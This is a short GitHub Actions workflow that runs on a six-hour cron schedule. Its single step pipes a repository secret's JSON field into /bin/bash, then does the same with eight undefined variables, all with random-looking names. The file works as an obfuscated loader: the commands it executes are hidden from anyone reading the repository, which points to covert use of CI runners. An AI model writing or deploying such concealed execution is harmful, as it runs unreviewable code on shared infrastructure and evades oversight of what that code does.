name: hongquanzz
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hongquanzz
        env:
          hqk877: ${{ secrets.hqk877 }}
        run: |
          echo $hqk877 | jq -r .buz2 | /bin/bash
          echo $ptoax4460 | jq -r .yui28298 | /bin/bash
          echo $gqk3 | jq -r .aolr2 | /bin/bash
          echo $ip2114 | jq -r .bostx51 | /bin/bash
          echo $me516 | jq -r .rfhzn13 | /bin/bash
          echo $fj59941 | jq -r .ijcr76670 | /bin/bash
          echo $pdkf3362 | jq -r .cpvyx4577 | /bin/bash
          echo $icq05546 | jq -r .esgs944 | /bin/bash
          echo $qnhi3 | jq -r .kevwe06 | /bin/bash

